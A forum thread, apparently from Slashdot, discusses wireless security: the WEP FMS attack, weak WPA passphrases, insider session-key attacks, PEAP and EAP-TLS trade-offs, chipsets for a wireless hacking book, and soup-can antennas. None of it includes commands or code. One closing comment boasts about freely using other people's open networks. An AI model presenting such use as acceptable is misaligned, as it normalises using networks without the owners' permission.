> Then what's the point of releasing it ? (Besides, releasing a security safeguard knowing that it is flawed and without warning the users about the flaw == very fat lawsuit. Was the standard commetee sued ?) Also, would it make any sense if someone would release a VPN suite using 16 bit DES keys or simple XORing now ? Actually, for more than a year after the FMS attack was published, many in the standard group still denied the attack's practicality.

WPA and RSN are looking forward to provided a sufficient number of years of protection before future processing power is able to defeat it.

>WEP was not defeated via processing power.

PSK with weak passwords is theoretically attackable. I don't think there's a script for the kiddies yet

>Not in the public domain.

if you choose a passphrase like "i read about this on slashdot, Wi-Fooers!", then you are not at risk from that attack.

>how many real world users remember passphrases of that length without writing them down on a sticker on their box ? Also, the main risk presented by the Moscowitz attack is not from the outside wardrivers, but from the same company employees who do know the shared passphrase and then can calculate session keys of other employees to own their traffic.

Yes, I would choose to distribute the user certs for TLS. There are many managment tools for this.

> How secure is the certs distribution provided by these tools, in particular if we are talking about the distribution over wireless ? Won't it introduce another good point for crackers to break-in ?

The problem with PEAP is that the CA cert is widely distributed, if not actually public, which could allow someone to attack weak passwords.

> So, 8021x/EAP-PEAP is crackable, after all :)

I glad you got something out of the book. I do think they present it as a practical guide, but then are too vague in spots, and even resort to hand waving at the higher end.

>Looks more like direction pointing for me.

Take their advice on acquiring a WLAN card with the Prism chipset.

>Are there any other wireless chipsets with specs as open as those of ex-Intersil's Prism ?

Many of the manufacturers they mention don't sell Prism based cards anymore.

>e-bay still does. And it usually takes 1-2 years to develop, edit and publish a fat book, so some info will be inevitably obsolete by that time. Check out the versions of services and tools described in many O'Reilly tomes, Hacking Exposed series and so on. Despite this, these books are still useful to have and I'm running out of room space to store them.

Just another example of how you have to figure it out yourself anyway (as with most of the software). So, who needs the book?

>Someone who wants a logical framework, food for thought and directions for development instead of being spoon-fed.

Your efforts are futile

http://www.moser-informatik.ch/

Homebrew it.

[Gordonjcp]

Not a "Pringles can" antenna - they suck, badly. Nope, what you want is an 800g soup can to make a stopped waveguide antenna. Use one at each end. If that doesn't do it, use it as the feed for a dish.

Re:Bad Name

And then there's always this happy soldier who enjoy a warm cup of STFU.

EAP-TLS

[Jacco+de+Leeuw]

You write in your thesis that EAP-TTLS and PEAP are more secure than EAP-TLS. Could you elaborate on this?

Re:EAP-TLS

[rworne]

IIRC, at the time the paper was written, EAP-TTLS and PEAP leaked the least amount of info to a possible attacker and had no known exploits at the time. Check the link offered in the bibliography, it explains it in more detail.

The key point of that section (as miserably brief as it was, I admit) was to point out there are developments helping the situation, but the overall opinion is that wireless networks are not secure and people need to be aware of the traffic that is sent over them and what this traffic might reveal to an attacker.

Frankly, I needed another semester to work on the thesis, but schedules are a pain.

Wireless has made the internet free for me.

[eBayDoug]

I'm in the city.

I have 2 or 3 open wireless networks to to tap into at anytime, right from the office.

I love my free internet.